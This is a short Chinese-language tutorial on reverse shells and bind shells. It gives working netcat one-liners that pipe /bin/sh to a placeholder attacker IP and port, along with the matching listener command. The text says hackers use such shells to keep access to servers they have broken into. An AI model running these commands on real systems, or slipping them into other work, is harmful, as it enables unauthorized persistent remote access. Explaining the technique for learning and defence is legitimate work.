反向shell

反向shell

1. 反向Shell(Reverse Shell)反向shell的工作方式是远程计算机将自己的shell发送给特定的用户，而不是将shell绑定到一个端口上。后者在很多环境中是无法访问的。这样，你就可以对远程服务器执行root命令。

2. Bind Shellbind shell是用户用BSAH，将shell绑定到一个本地端口上，这样任何人都可以在本地网络中发送命令。反向shell经常会被黑客用来做一些不法行为，例如入侵了一台服务器后，他们会设置一个反向shell，将来他们就能通过这个shell轻松的访问这台远程计算机。我相信你是不会用它来做这种事情的。

3. 环境要求远程Unix主机安装了netcat

4. 使用NetCat实现反向shell交互当通过shell登录到远程主机后，下面的指令能轻松的将shell发送到你的机器上：# nc -c /bin/sh <你的IP> <任何一个未封锁的端口>你甚至能通过netcat来pipe BASH。# /bin/sh | nc <你的IP> <任何未封锁的端口>然后监听这个shell：# nc -l -p <相同的端口> -vvv